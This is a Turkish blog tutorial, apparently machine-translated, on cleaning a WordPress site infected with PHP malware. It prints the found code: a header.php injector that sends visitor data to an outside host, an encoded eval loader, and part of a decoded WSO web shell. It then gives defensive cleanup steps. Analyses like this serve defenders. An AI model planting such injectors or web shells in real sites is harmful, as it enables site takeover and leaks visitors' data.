Kaldır WordPress PHP Virüsü

Bu öğretici, bir blogun bulunduğu belirli bir durumu sunar. WordPress bulaşmıştı. Kaldırma WordPress PHP Virüsü.

Geçen gün PHP virüsü gibi görünen şüpheli bir kod fark ettim. WordPress. Aşağıdaki PHP kodu mevcuttu header.php, satırdan önce </head>.

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

Bu, harici bir sunucudan bir kaynağın içeriğini almaya çalışıyormuş gibi görünen bir PHP kodudur, ancak URL'ye atıfta bulunan kısım eksiktir.

Çalışma mekanizması biraz daha karmaşıktır ve bunu yapar WordPress Etkilenen sitelerin ziyaretçileri için görünmez PHP Virus. Bunun yerine, arama motorlarını (Google) hedefler ve dolaylı olarak etkilenen web sitelerinin ziyaretçi sayısında önemli bir düşüşe yol açar.

Içerik

Kötü amaçlı yazılımın ayrıntıları WordPress PHP Virus

1. Yukarıdaki kod şu adreste mevcuttur: header.php.

2. Sunucuda bir dosya belirdi wp-log.php klasörde wp-includes.

3. wp-log.php şifrelenmiş bir kod içerir, ancak şifresini çözmesi nispeten kolaydır.

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

Kötü amaçlı yazılım kodunun şifresini çöz wp-log.php :

<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

Bu, bir sunucudaki dosya ve dizinlerde kimlik doğrulama ve eylemleri işlemek için kod içeren kötü amaçlı bir PHP betiği gibi görünüyor. Bu betiğin aşağıdaki gibi değişkenler içerdiği çok kolay görülebilir. $auth_pass (kimlik doğrulama şifresi), $default_action (varsayılan eylem), $default_use_ajax (varsayılan olarak Ajax kullanılarak) ve $default_charset (varsayılan karakter ayarı).

Açıkçası, bu komut dosyasının, arama motorları gibi belirli web botlarına erişimi engellemek için HTTP kullanıcı aracılarını kontrol eden bir bölümü vardır. Ayrıca PHP güvenlik modunu kontrol eden ve belirli çalışma dizinlerini ayarlayan bir bölümü vardır.

4. Tarayıcıda wp-log.php'ye erişilirse, bir alan içeren bir web sayfası görünür. kimlik doğrulama. İlk bakışta, yeni dosyaların hedef sunucuya kolayca yüklenebildiği bir dosya yöneticisi gibi görünüyor.

Bir web sitesini nasıl virüsten arındırırsınız? WordPress?

Manuel virüs temizleme işlemi her zaman için öncelikle güvenlik açığının ne olduğunu keşfetmeyi ve anlamayı içerir.

1. Tüm web sitesi için bir yedek oluşturun. Bu, hem dosyaları hem de veritabanını içermelidir.

2. Virüsün yaklaşık olarak ne kadar süredir ortalıkta dolaştığını belirleyin ve yaklaşık zaman çerçevesi içinde web sunucusunda değiştirilmiş veya yeni oluşturulmuş dosyaları arayın.

Örneğin, dosyaları görmek istiyorsanız .php geçen hafta oluşturulmuş veya değiştirilmişse, sunucuda şu komutu çalıştırın:

find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"

Dosyaları ortaya çıkarabileceğiniz basit bir yöntemdir. WordPress virüslü ve kötü amaçlı yazılım kodu içerenler.

3. Dosyayı kontrol edin .htaccess şüpheli direktifler. İzin satırları veya komut dosyası yürütme.

4. Veritabanını kontrol edin. Bazı yayınların ve sayfaların olması oldukça olasıdır. WordPress kötü amaçlı yazılımla düzenlenebilir veya yenileri eklenebilir rolüne sahip kullanıcılar administrator.

5. Klasörler ve dosyalar için yazma izinlerini kontrol edin. chmod şi chown.

Önerilen izinler şunlardır: dosyalar için 644 ve dizinler için 755.

find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;

6. Tümünü güncelle WordPress Plugins / WordPress Themes.

İlgili: Fix Redirect WordPress Hack 2023 (Yönlendirme Virüsü)

Bunlar, bir web sitesini / blogu virüsten arındırabileceğiniz "temel" yöntemlerdir. WordPress. Sorunlarınız varsa ve yardıma ihtiyacınız varsa, yorum bölümü açıktır.